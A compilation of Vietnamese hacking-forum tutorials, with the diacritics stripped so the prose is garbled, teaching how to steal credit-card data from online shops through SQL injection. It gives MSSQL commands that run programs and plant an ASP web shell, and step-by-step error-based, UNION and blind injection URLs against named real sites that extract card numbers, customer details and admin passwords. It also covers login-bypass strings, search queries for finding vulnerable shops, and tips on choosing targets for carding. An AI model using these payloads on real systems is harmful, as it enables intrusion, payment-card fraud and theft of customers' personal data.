vd: declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' Tren cu truy vn: Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad. exe'-Dng 'scripting.filesystemobject' c file: declare @o int, @f int, @t int, @ret int declare @line varchar(8000) exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1 exec @ret = sp_oamethod @f, 'readline', @line out while( @ret = 0 ) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end To script ASP thi hnh command: declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>' y l nhng cch bn c th dng rt hiu qu,bn hy sng to thm cho mnh t nhng ch dn c bn ny.
HACK SHOP LY CREDITCARD BNG LI INJECTION SQL CHI TIT NHT-C SHOP THC HNH
- Tm v xc nh li Injection SQL: n nay vn cha c mt t kho no gip cc bn tm ra shop s dng SQL, v vy cn xc nh site shop dng SQL hack, thng th nn dng t kho "shopping asp", "Product", "VP-ASP shopping"... Sau khi tm c shop dng SQL, ti cu lnh c on cui tng t sau: store/viewProduct.asp?ec_products=6620 ta kim tra li bng cch thm du () vo sau du (=), v d:http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620' Nu hin thng bo li (ch ch in m): Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' ORDER BY viewOrder ASC'. /store/viewProduct.asp, line 114 Ngha l site ny b li Injection SQL, ta c th hack. - Cu trc cu lnh hack: Url victim+cu lnh V d:http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%20 1% 20table_name%20from%20information_schema.tables))--sp_password - y l 3 cu lnh c bn bn cn dng trong qu trnh hack li Injection SQL: 1/ Cu ly table: %20%2bconvert(int,(select%20top%201%20table_name%2 0from%20information_schema.tables))--sp_password Dng ly table tip theo: %20%2bconvert(int,(select%20top%201%20table_name%2 0from%20information_schema.tables%20where% 20table_name%20not%20in('table__c')))--sp_password 2/ Cu ly column: %20%2bconvert(int,(select%20top%201%20column_name% 20from%20information_schema.columns%20where% 20table_name%20='table_cn_ly_column'))--sp_password Dng ly column tip theo: %20%2bconvert(int,(select%20top%201%20column_name% 20from%20information_schema.columns%20where% 20table_name%20='table_cn_ly_column'%20and%20column_name%20not%20in('co lumn_bn__c)))sp_password 3/ Cu khai thc d liu: %20%2bconvert(int,(select%20top%201tn_column%2B'/'%2btn_column%20from tn_table_mun_khai_thc))-sp_password khai thc d liu k tip trn cng mt table bng:where tn_column not in %20%2bconvert(int,(select%20top%201tncolumn%2B'/'%2btncolum%20from%20tn_table_khai_thc%20where% 20tn_colum_cha_d_liu__c%20not%20in('d_liu__c_ca_column_khai_bo_pha_trc)))--sp_password Ch : Phi dng -sp_password admin khng pht hin c Sau y l v d thc hnh, site ny c CC:
I/ Xem xt site sau: Cc bn c th copy cc on link mu cho chy trn IE theo di kt qu hng dn. http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620' C li Injection SQL II/ Ly table: 1/ Ly table u tin: http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%20 1% 20table_name%20from%20information_schema.tables))--sp_password Kt qu: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'donations' to a column of data type int. /store/viewProduct.asp, line 114 'donations' l table u tin 2/ Ly table k tip:http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select% 20top%20 1%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in ('donations' )))--sp_password Kt qu: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Editor' to a column of data type int. /store/viewProduct.asp, line 114 'Editor' l table th 2 3/ Table th 3: http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%20 1% 20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in ('donations' ,'Editor')))--sp_password Kt qu: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'bills' to a column of data type int. /store/viewProduct.asp, line 114 V cc bn lm tng t ly ht table, n khi khng xut hin thm table l ht. Kt qu: http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%20 1% 20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in ('donations' ,'Editor','bills','bills_20040213','billsCandidate s','billsCandidates_20040213','billsCandidatesImpo rt','candidates','candidates_20040213','candidates New','contribute','dtproperties','ec_categories',' ec_orders','ec_priceBreaks','ec_products','ec_regi on','ec_shippers','ec_shippingOrders','ec_supplier s','ec_territory','Editor_letters','Editor_queue', 'Editor_recipients','emailUpdates','MinnesotaHouse RollCallVotes','MinnesotaSenateRollCallVotes','off ices','parties','party','Postcards','PostcardsBlac klist','ppmsd','sbEntries','siteSection','storetem p','stories','storyCategories','subjects','syscons traints','syssegments','tblConstitutionalOfficerSl ate','tblConstitutionalOfficerSlate$','tblStateLeg 2002_Query','users','users_choice','vw_contribute_ pending','vw_contribute_processed')))--sp_password II/ Ly column: Ch cc table cha d liu quan trng lin quan n CC v pass admin thng c tn: orders, user, tbloders, tbluser...
1/ Khai thc column u tin trong table 'ec_orders': http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%20 1% 20column_name%20from%20information_schema.columns%20where%20table_name%20='ec_orders'))-sp_password Kt qu: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'firstname' to a column of data type int. /store/viewProduct.asp, line 114 'firstname' l column u tin trong table 'ec_orders' 2/ Ly column tip theo: http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%20 1% 20column_name%20from%20information_schema.columns%20where%20table_name%20='ec_orders'%20and% 20column_name%20not%20in('firstname')))--sp_password Kt qu: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'lastname' to a column of data type int. /store/viewProduct.asp, line 114 3/ Lm tng t khai thc ht column ca table ny: Kt qu: http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%20 1% 20column_name%20from%20information_schema.columns%20where%20table_name%20='ec_orders'%20and% 20column_name%20not%20in ('firstname','lastname','email','orgName','address','city','state','zip','tele_areacode','tele_first','tele_last','credit_card','card _number','ExpDate_month','ExpDa te_year','timestamp','shippedDate','orderNumber','shipped','billing_firstname','billing_lastname'lastname', 'billing_email','billing_orgName','billing_address ','billing_city','billing_state','billing_zip','bi lling_tele_areacode','billing_tele_first','billing _tele_last','nameOnCard','survey_nameOfPerson','survey_materials','survey_ emailAddress','survey_findMethod','survey_interest ed','po_number')))--sp_password III/ Khai thc CC: Cc bn ch cc column quan trng trong table 'ec_orders' c in m: 1/ Khai thc 'credit_card','card_number' trong 'ec_orders' : http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%20 1% 20credit_card%2b'/'%2bcard_number%20from%20ec_orders))--sp_password Cc bn dng link trn xem kt qu (v ni quy ca From nn khng a kt qu ra) Tng t, ly kt qu k tip: http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%20 1% 20credit_card%2b'/'%2bcard_number%20from%20ec_orders%20where%20card_ number%20not%20in ('card_number-bn__c__trn')))--sp_password S column truy vn ty thuc vo thch ca mi bn. Dng %2b'/'%2b ngha l hin th kt qu c phn cch bng du (/) d nhn bit. Cc bn lu : s column truy vn cng nhiu th kh nng truy xut d liu cng thp v cu lnh khng hiu nhng khong trng khng c d liu. Tt nht l th vi 1 column kim tra kt qu, sau thm column k tip vo cu lnh truy xut.
Cu lnh truy xut hon chnh trong table ec_orders ca site ny (cc bn dng link ny xem kt qu&#7843 : http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%20 1% 20firstname%2b'/'%2blastname%2b'/'%2bemail%2b'/'%2borgName%2b'/'%2baddress%2b'/'%2bcredit_card%2b'/'% 2bcard_number%2b'/'%2bExpDate_month%2b'/'%2bExpDate_year%2b'/'%2bnameOnCard%2b'/'%2bcity%2b'/'% 2bstate%2b'/'%2bzip%20from%20ec_orders))--sp_password Tng t bn c th lm vi cc table khc ly d liu ca admin, customer... IV/ Mt s kinh nghim trong qu trnh hack shop bng li Injection SQL: - Sau khi pht hin site li Injecton SQL, bn nn mua th mt mn hng no y trn site ny kim tra cc thng tin sau: c cho php dng CC mua khng, CC c cvv2, thanh ton online trn site b li hay trn mt site khc, customer ng nhp mua hng c dng password khng...tt c nhng thng tin lin quan n vic mua bn xc nh c nn hack site ny khng. - Nn khai thc u tin l creditcard_number , nu khng c, c kh nng site fix d liu hoc dng mt site khc thanh ton. - Khi ly c user/pass ca admin cn dng n ng nhp server vi giao thc ftp, v d:ftp://ppmsddev.ctsg.com/, nu maymn bn c th lm ch server v khng cn phi ph cng nhiu trong khi hack. - Thng cc site ny hay du link ng nhp quyn admin, bn cn chu kh tm, v dng chng trnh scan Url ca trang ny tm trang ng nhp. - C mt s trng hp, site b li Injectjon nhng hin trang bo li: The page cannot be displayed, bn cn ch pha bn di pht hin thng bo li ca Injection SQL, v d: The page cannot be displayed There is a problem with the page you are trying to reach and it cannot be displayed. ................... HTTP 500.100 - Internal Server Error - ASP error Internet Information Services Technical Information (for support personnel) Error Type: Provider ('80040e14') Type mismatch. /shopping/shop$db.asp, line 875 Browser Type: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Page: GET /shopping/shopdisplayproducts.asp Time: Friday, February 27, 2004, 11:20:19 PM More information: Microsoft Supporthttp://www.microsoft.com/ContentRedirect.asp? prd=iis&sbp=&pver=5.0&ID=500;100&cat=Provider&os=&over=&hrd=&Opt1=&Opt2=% 2D2147352571&Opt3=Type+mismatch%2E
TUTORIAL NAY KHONG BIET TAC GIA

Thc ra th ci li ny c t lu ri , nhng cc bn bit ti sao m n cn nhiu khng , rt nhiu , rt nhiu . Bi v n gin l " nhc " . Jet database c nhiu cch , nhng lm theo cch ny newbie d hiu v cng khng cn lm g ngoi vic thm dng lnh sau url b li c .Bt u 1. Vo google search t kho :proddetail.asp?prod=* < * y cc bn c th thay th = bt c s no 1, 2,3 ... hay 100 , 200 , tu > 2. Thm du ' tm site c li 3. Nhn bit site c li = dng sau CODE Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /Retail/vsadmin/inc/incproddetail.asp, line 33 4. V d c th , ti check th sitehttp://www.kleer-fax.com/proddetail.asp?prod=23305 Thm du ' vo sau 23305 ok ?? Li hin ra CODE Microsoft JET Database Engine error '80040e14' Syntax error in string in query _expression 'pId='23305'''. /proddetail.asp, line 246 Bt u khai thc nh cc bn , tm table v collumn ca n = lnh truy vn sau : QUOTE %27union%20select%201%20from%20admin Sau khi thm cu lnh vo link ta c :http://www.kleer-fax.com/proddetail.asp?prod=23305%27union%20select% 201%20from%20admin Ta c QUOTE Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /proddetail.asp, line 246 , sai ri , a y , li va ri ni rng : c tn ti gi tr collumn cha thng tin admin , check tip Thm ,2 vo sau select%201 . CODE http://www.kleer-fax.com/proddetail.asp?prod=23305%27%20union%20select% 201,2%20from%20admin A n cng bo y nh trn CODE Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /proddetail.asp, line 246
Khi vn cha tm ra c ci minh cn th cc bn c thm ln lt ,3,4,5,6,7,8 vo tip cho n khi : QUOTE Home : All Products 4-5-6 Item: 3 List Price: $9.00 USD 7 201 Hehe y chnh l ci ta cn tm . V dy s ta cn thm vo trn kt thc n s 14 < May m mi n s 14 , ko nn > Chu y s 7 va 201 nhe , o la thng tin cu a 2 columb ch a thng tin Admin ( user/ pass) Ta thay cu lnh truy v n user va pass admin va o vi tri 201 va 7 Mt qu , :( n tn s 201 , ai mun hc tp th nh n s 201 nha :D tin cc bn test mnh gi s s 201 l s 1 th cu truy vn s l CODE http://www.kleer-fax.com/proddetail.asp?prod=23305%27and%201=0%20union% 20select%201%2c2%2c% 27username:%20%27%2badminuser%2c4%2c5%2c6%2c%27password:%20%27%2badminpassword%2c8%2c9% 2c10%2c11%2c12%2c13%2c14%20from%20admin , cc bn nh n s 200 ri n 201 th thay = adminpassword :D . Lc s hin ra nhng dng sau QUOTE Please choose from the list below. Change username / password: Edit admin settings: Edit categories: Edit products: Logout: Chu y : Khi union c ma ko ba o li thi m i du ng and 1=0
TUTORIAL FROM HCV

---- y l phng php hack li SQL nng cao i vi cc shop VP-ASP. c s gip ca 1 admin trong HCV hin ti Quoc xin c chia s vi cc bn ********************************************** Vuln: SQL Inject in VP-ASP all of version Exploiter: Unknown Tool: Mozilla Firefox Download ********************************************** u tin, bn phi tm ra shop ca victim Cng c:http://google.com/ Keyword: shopdisplayproducts.asp? shopaddtocart.asp? shopexd.asp Cc bn t tm thm key cho mnh nh. V d y tui chn shop CODE https://www.sfp.net/shopaddtocart.asp?catalogid=1 Sau chng ta thm du ' vao pha sau link thnh nh sau CODE https://www.sfp.net/shopaddtocart.asp?catalogid=1' Ok, chng ta bt u tm link admin nh ---- Tm ch u tin trong link admin, cc bn thm dng lnh ny vao pha sau link trn nh CODE https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fieldname%20from%20configuration% 20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='s') Chng ta s thay dn gi tr 's' sao cho ng vi k t u tin ca link y tui tm c l k t 'a' ---- Sau tm tip chiu di ca link admin (thng th tu gia tr th 5 tr i v link admin s c thm .asp v du admin.asp <--- c 9 k t) CODE https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fieldname%20from%20configuration% 20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a' and len(fieldvalue)=5) Thay tip gi tr 5 thnh cc gi tr s cho n khi tm c ng chiu di ca link admin. y mnh tm c l 15 ki t ---- Tip theo tm cc k t cn li trong link admin nh. CODE https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fieldname%20from%20configuration% 20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,2)='ad')
Thay i dn gi tr trong lnh left ng vi v tr k t ca link admin. Sau khi tm c link admin, chng ta s c adminonline.asp ---- Tip theo tm username Cc bn thm cu truy vn ny pha sau link nh CODE %20or%201=(select%20fldusername%20from%20tbluser%20where%20left(fldusername,1)='q') Khi cu truy vn s l CODE https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fldusername%20from%20tbluser% 20where%20left(fldusername,1)='s') y k t u tin l 's' ---- Tip theo tm chiu di ca username CODE https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fldusername%20from%20tbluser% 20where%20left(fldusername,1)='s' and len(fldusername)=3) Chng ta s tm c username l "sfp" ---- Tm password Cng tng t nh trn ch cn thay fldusername bng fldpassword Cc bn thm cu truy vn ny pha sau link nh CODE %20or%201=(select%20fldpassword%20from%20tbluser%20where%fldusername='sfp' and left(fldpassword,1)='p') Tm password tng ng vi username l "sfp". Ch u tin l 'p' Khi cu truy vn s l CODE https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fldpassword%20from%20tbluser% 20where%fldusername='sfp' and left(fldpassword,1)='p') y k t u tin l 'p' ---- Tip theo tm chiu di ca password CODE https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fldpassword%20from%20tbluser% 20where%fldusername='sfp' and left(fldpassword,1)='p' and len(fldpassword)=11) Sau khi tm c chng ta s co pass l 'performance' ************************************************************* Cui cng sau khi hon tt chng ta s c link admin l http://www.sfp.net/adminonline.asp user: sfp pass: performance
TUTORIAL BY CONGLAPHVA
-Vo www.google.com.vn nh vo -allinurl:'/product.asp/' -allinurl:'/product.asp?productid/' -allinurl:'/logint.asp' -By gi ta bt u cng vic,ti chn 1 site hackhttp://www.victim.com/store/category.asp?CategoryID=83 -Kim tra li:http://www.victim.com/store/category.asp?CategoryID=83' ( ta ch cn nh vo du ' test li ) -Kt qu: Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string ''. /store/includes/common.asp, line 2116 1. Thu thp cu trc d liu : Ly Table u tin http://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201% 20table_name%20from%20information_schema.tables))--sp_password Kt qu: Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'StateTaxes' to a column of data type int. /store/includes/common.asp, line 2116
Nh vy ta c table u tin l StateTaxes. Ly tip table th hai : http://www.victim.com/store/category.asp?CategoryID=82%20and%201=convert(int,(select%20top%201% 20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('StateTaxes')))-sp_password
Kt qu: Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'BillingAddresses' to a column of data type int. /store/includes/common.asp, line 2116
Nh vy table th hai l BillingAddresses Ly tip table th ba http://www.victim.com/store/category.asp?CategoryID=82%20and%201=convert(int,(select%20top%201% 20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20 ('StateTaxes','BillingAddresses')))--sp_password Kt qu: Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'Categories' to a column of data type int. /store/includes/common.asp, line 2116 cc bn c ly kt qu ca table th 3 (ch mu xanh) thay th vo sau table 3 l ly c ton b table ca site ny VD: http://www.victim.com/store/category.asp?CategoryID=82%20and%201=convert(int,(select%20top%201% 20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20 ('StateTaxes','BillingAddresses','Categories')))--sp_password -Cn y l ton b table ca site ny http://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201% 20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20 ('StateTaxes','BillingAddresses','Categories','Countries','CreditCards','Discounts','dtproperties','Groups','homeblurb','Ite mGroups','Items','Manufacturers','Members','OrderItems','OrderItemsShipped','Orders','SavedCart','SavedCartItems','Se cure','SessionData','Settings','SettingsFreeShippingCountries'.'ShippingAddresses')))--sp_password CC thng cha trong cc table Orders hay creditcard, y ti chn Orders hack. Ly Column u tin http://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201% 20column_name%20from%20information_schema.columns%20where%20table_name=('Orders')))--sp_password Kt qu: Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'OrderID' to a column of data type int. /store/includes/common.asp, line 2116
Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'DateCreated' to a column of data type int. /store/includes/common.asp, line 2116
Ta ln lt ly ht coloum ca table ny, c kt qu nh sau: http://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201% 20column_name%20from%20information_schema.columns%20where%20table_name=('Orders')%20and% 20column_name%20not%20in%20 ('OrderID','DateCreated','MemberID','ShippingMethod','Company','FirstName','LastName','Address1','Address2','City',' State','Zip','ForeignAddress','Country','Phone','Fax','Email','CardName','CardType','CardNumber','ExpirationDate','Car dAddress','CardZip','ShippingAddress1','SubTotal','Discount','DiscountDescription','Tax','Shipping','OrderTotal','PONu mber','ResaleNumber','Handling','Comments','Referer','StoreName','ShippingCompany','ShippingFirstName','Shipping LastName','ShippingAddress2','ShippingCity','ShippingState','ShippingZip','ShippingForeignAddress','ShippingCountr y','ShippingPhone','ShippingFax','CardVerification','CardVerificationNone','CardVerificationRead','PhoneOrder','FRE EShippingMethod')))--sp_password
Ta ly thng tin ca coloum ny Cc coloum quan trng thng l First/Last name/Address1/city/state/zip/Country/phone/fax/email/cardname/ cardtype/Cardnumber/ExpirationDate/CNV2 (tuy nhin site ny o c cnv2) ->nhiu chc cng ri nh? Theo ng link ny s c cc http://www.victim.com/store/category.asp?CategoryID=82%20and%201=convert(int,(select%20top%201% 20CardName%2b'/'%2bAddress1%2b'/'%2bCity%2b'/'%2bState%2b'/'%2bZip%2b'/'%2bPhone%2b'/'%2bCountry% 2b'/'%2bCardNumber%2b'/'%2bExpirationDate%20from%20Orders))--sp_password
cc bn cn thng tin g th c chn /'%2b******%2b'/ vo tm c cc u tin,cc bn dng link ny ly cc th 2 v tip tc http://www.victim.com/store/category.asp?CategoryID=82%20and%201=(select%20top%201%20CardName%2b% 27/%27%2bAddress1%2b%27/%27%2bCity%2b%27/%27%2bState%2b%27/%27%2bZip%2b%27/%27%2bPhone% 2b%27/%27%2bCountry%2b%27/%27%2bCardNumber%2b%27/%27%2bExpirationDate%20from%20Orders% 20where%20CardNumber%20not%20in('XXXXXXXXXXXXXXX')%20) Lly c cc th 2 th ly s number ca card thm vo sau link trn ch 'XXXXXXXXXXXXXXXX'
TUTORIAL BY SEAMOUN
Ti thy cc bn quan tm nhiu n hack shop VPASP, nn ti vi t mt bi cc tham kho, mc d c nhng ti thy cng cn nhiu Web b li ny. VPASP khi cn ni cc bn cng bit l Shopping Cart. Phin bn b li SQL - Injection l 4.5 v 5.0 cn nhng phin bn mi th ti khng c source xem n cn li g hay khng ? V VPASP thng s dng c s d liu MS Access cho nn vic ngt lnh nh SQL - Server l khng th cho nn ch cn mt cch l hp lnh SQL ly kt qu. Thc hin cc bc sau: Bc 1: Vo Google.com, tm cm t sau: allinurl: shopdisplaycategories.asp. Bn s thy ra c ng site. Kim tra link xem c b li SQL - Injection hay khng ? Bc 2: i vi phin bn VPASP 4.5 th li ti file shopdisplaycategories.asp v shopdisplayproducts.asp. phin bn VPASP 5.0 th sa li hai file trn nhng cn mt ch vn b li l file shopexd.asp V d site sau: http://www.hopscotchdressingup.co.uk/store/shopdisplayproducts.asp?id=8'&cat=Halloween. Mc d ta thm ' ti shopdisplayproducts.asp?id=8' nhng vn khng b li. Ta th tip file link sau : http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149'. N xut hin li HTTP 500 - Internal server error Internet Explorer Bc 3: Ta thc hin gp lnh ly gi tr username v password nh sau: Link ban u :http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149 Link gp truy vn : http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=-1 union select catalogid,ccode, fldusername%2b'/'% 2bfldpassword,cdescription,cprice,ccategory,cdescurl,features,cimageurl,cstock,w eight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,specialoffer,categor y,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,keywords,templ ate,extendedimage,extendeddesc,selectlist,level3,level4,level5,minimumquantity,s upplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdown load,groupfordiscount,clanguage,points,pointstobuy,price2,price3,billprice,billi nstallments,billinstallmenttype,billinterval,maximumquantity,frontpage from products,tbluser where catalogid=149 . Cc bn s hi l ci ng hn n link trn ly u ra?H h ch c source VPASP mi bit n gm nhng trng no trong bn product ri t gp
lnh cho cc trng v thay th trng tn ca sn phm bng trng username v password. S d ta phi cho id=-1 ngt lnh SQL th nht khi hp nht th n s thc hin lnh SQL th hai. Sau khi hp SQL ta s c kt qu user v password l "Sy87XXXXX/gL37ytXXXXX" l hai gi tr c thay th ti tn ca sn phm. Nh vy ta c user v password ca admin ri. Mng qu login vo shopadmin.asp thi !. Thng thng th tn file Admin ControlPanel l shopadmin.asp nu nh n cha i. Bc 4: Ta truy cp vo http://www.hopscotchdressingup.co.uk/store/shopadmin.asp th xem th no? Ch ! file n i tn mt ri. Lm sao y ? Tip tc gp lnh ly tn file thay i thi ! Cng vi link http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149 ta gp lnh nh sau ly tn file truy cp vo Admin Control Panel. http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=-1 union select catalogid,ccode,fieldvalue,cdescription, cprice,ccategory,cdescurl,features,cimag eurl,cstock,weight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,special offer,category,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,k eywords,template,extendedimage,extendeddesc,selectlist,level3,level4,level5,mini mumquantity,supplierid,crossselling,hide,productmatch,customermatch,orderattachm ent,orderdownload,groupfordiscount,clanguage,points,pointstobuy,price2,price3,bi llprice,billinstallments,billinstallmenttype,billinterval,maximumquantity,frontp age from products,configuration where fieldname='xadminpage' and catalogid=149 Sau khi thc hin ta c tn file truy cp vo Admin Control Panel l hopoff.asp Nh vy ta c th truy cp n file Admin. http://www.hopscotchdressingup.co.uk/store/hopoff.asp. Lu : Khi truy cp vo Admin Control Panel nu gp hai trng nhp password th : mt l ngi th hai l i kim ci khc. V password th 2 l mt hng nn khng th dng cch hp lnh ly c. Mun ly chc vit email n admin hi th password th hai l g, ti c password th nht ca you ri !!! Hi hi hi i vi phin bn VPASP 4.5 th cng lm tng t nh trn ch khc l ch gp lnh ly username, password v tn file truy cp vo Admin Control Panel V d : http://<site b li>/shopdisplaycategories.asp?id=1 chng hn. Th lnh gp ly username, password v tn file admin nh sau http://<site b li>/shopdisplaycategories.asp?id=1 union select catalogid,ccode,fldusername%2b':'% 2bfldpassword, cdescription,cprice,ccategory,cdescurl,features,cimageurl,cstock,w eight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,specialoffer,categor y,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,keywords,templ ate,extendedimage,extendeddesc,selectlist,level3,level4,level5,minimumquantity,s upplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdown load,groupfordiscount,clanguage,points,pointstobuy,price2,price3 from products,tbluser where 1=1 or 1=1
http://<site b li>/shopdisplaycategories.asp?id=1 union select catalogid,ccode,fieldvalue,cdescription,cprice, ccategory,cdescurl,features,cimag eurl,cstock,weight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,special offer,category,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,k eywords,template,extendedimage,extendeddesc,selectlist,level3,level4,level5,mini mumquantity,supplierid,crossselling,hide,productmatch,customermatch,orderattachm ent,orderdownload,groupfordiscount,clanguage,points,pointstobuy,price2,price3 from products,tbluser,configuration where fieldname='xadminpage' Site VPASP s dng c s d liu SQL - Server th qu d khai thc nh sau http://<site b li>/shopdisplaycategories.asp?id=1 and%201=convert(int,(select%20top%201%20fldusername%2b'/'%2bfldpassword%20from%20tbluser))-sp_password http://<site b li>/shopdisplaycategories.asp?id=1 and%201=convert(int,(select top 1 fieldvalue from configuration where fieldname='xadminpage'))--sp_password PS: My you thc hnh th ng c file site ca h nha !
TUTORIAL BY GAMMA95
Mt trong nhng cu hi thng gp nht khi cc bn i hack website m h qun tr CSDL n xi Access l Ti sao lc th dng Union exploit c nhng lc th li l 1 ci error kh chu tng t th ny Error Type: Microsoft JET Database Engine (0x80004005) Syntax error in FROM clause. bn ra ??v liu c th c cc no khai thc tip c ko ,xin tha rng s d chng ta b nh vy chng qua Access ko c k t comment kiu nh nh trong MSSQL ,nu c th ko cn g ni mnh th ch c vi kinh nghim s s v v ny nn vit bi ny hy vng phn no giI p thc mc ca cc ban Do rules ca HVA l ko c public cc site li ,nn mnh nh phi t ch bin code li ca thng vpasp v up ln ci host tm test Ok linktest http://b.domaindlx.com/philips/asp/shopadmin.asp code verify user+pass trong file shopadmin.asp l username=request("Username") userpassword=request("password") if ucase(Username)<>"SUPPLIER" then sql = "select * from tbluser where fldusername='" & username & "' and fldpassword='" & userpassword & "'" //h,thc t mnh del 2 dng code [QUOTE]username=replace(username,"'","") userpassword=replace(userpassword,"'","")[/QUOTE] lc du nhy n nn hin gi n b bypass,v cng xin ni su hn cht v by pass ti ci form ny nu bn insert [QUOTE]username: or = password:anything[/QUOTE] th ko c,nhng nu cc bn bypass nh th ny [QUOTE]username:anything password: or =[/QUOTE] th lI ok ,tI sao vy ??nguyn nhn do nu bn by pass theo kiu trng hp 1 th an query get t form s l sql = "select * from tbluser where fldusername= or = and fldpassword=anything[/QUOTE] do th t u tin ca php tan nn php tan and s c u tin trc php or v th th v = and fldpassword=anything s c thc thi trc v c chn tr l false (do = true but fldpassword=anything false qua php and s l false ) sau c or vi query cn li l fldusername= or false l false (do ci fldusername= l false nn or 2 v false ra false ) -->ko bypass c cn trng hp 2 [QUOTE]sql = "select * from tbluser where fldusername=anything and fldpassword= or =[/QUOTE] do th t u tin ca php tan php tan and s c u tin trc php or v th v fldusername=anything and fldpassword= s thc thi trc v s c gi tr false (do fldusername=anything l false v fldpassword= cng false nt,nhng sau n li c or = (= lunng ) nn chn tr nguyn query ny l true --> by pass ph v th trc gi cc bc i by pass tan l username : or = password : or = cho chc c phI ko nh ??..hehe ,nhng ci em ni trn cho cc bc hiu su su v by pass cht thi Thi,ny gi lan man w,ko i vo ch chnh
